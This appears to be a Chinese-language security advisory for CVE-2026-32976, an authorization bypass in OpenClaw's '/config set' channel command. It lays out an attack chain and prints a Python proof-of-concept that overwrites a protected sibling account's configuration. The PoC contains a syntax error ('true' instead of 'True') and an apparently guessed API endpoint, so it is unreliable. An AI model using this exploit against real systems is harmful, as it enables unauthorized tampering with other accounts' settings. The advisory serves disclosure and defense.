CVE-2026-32976 CVSS 6.5 中危

CVE-2026-32976 OpenClaw授权绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32976

漏洞类型

授权绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.11 之前的版本中存在一处授权绕过漏洞。尽管系统实施了 configWrites 限制以保护配置，但攻击者仍可利用特定的通道命令修改受保护的兄弟账户配置。已获得某账户授权的攻击者，能够通过发送特制的通道命令（如 /config set）来绕过安全策略，进而篡改被设为只读的目标账户配置。该缺陷破坏了账户间的隔离机制，对系统完整性构成威胁。

技术细节

该漏洞的核心在于 OpenClaw 处理通道命令时的访问控制列表（ACL）验证不完善。在受影响版本中，当用户执行 `/config set channels.<provider>.accounts.<id>` 命令时，系统仅验证了发起请求的账户是否具备基本的通道命令执行权限，而未深入检查其对目标对象（即兄弟账户）是否拥有配置写入权限。由于 `configWrites: false` 标志在命令解析树的特定路径中被忽略，攻击者可以利用这一点，利用合法账户的上下文环境，越权修改其他账户的关键配置参数。这种利用方式无需用户交互，攻击难度低，且直接导致系统完整性受损，可能引发服务中断或数据泄露等次生灾害。

攻击链分析

STEP 1

1. 获取初始访问权限

攻击者获取 OpenClaw 系统中一个普通账户的合法访问凭证。

STEP 2

2. 识别目标账户

攻击者确定想要攻击的目标兄弟账户ID及相关提供商信息。

STEP 3

3. 构造恶意命令

攻击者构造特定的通道命令 `/config set channels.<provider>.accounts.<id>`，意图修改目标配置。

STEP 4

4. 执行越权操作

攻击者发送请求，系统错误地绕过了对目标账户 `configWrites: false` 的检查。

STEP 5

5. 完成攻击

目标账户的配置被成功修改，导致完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32976
# Exploits authorization bypass in OpenClaw via channel commands
import requests

def exploit_openclaw(target_url, attacker_token, target_account_id, provider):
    """
    Attempts to modify a protected sibling account configuration.
    """
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "Content-Type": "application/json"
    }

    # Malicious command payload to bypass configWrites: false
    payload = {
        "command": "/config set",
        "args": {
            "path": f"channels.{provider}.accounts.{target_account_id}",
            "value": {
                "configWrites": true,
                "malicious_setting": "pwned"
            }
        }
    }

    try:
        response = requests.post(f"{target_url}/api/command", json=payload, headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful! Configuration modified.")
            return True
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Usage
# exploit_openclaw("http://target:8080", "attacker_jwt_token", "victim_account_id", "slack")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

建议立即检查系统配置，临时禁用非必要的通道命令功能，直到完成升级。同时，应严格审查账户间的权限隔离情况，确保 configWrites 策略生效。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表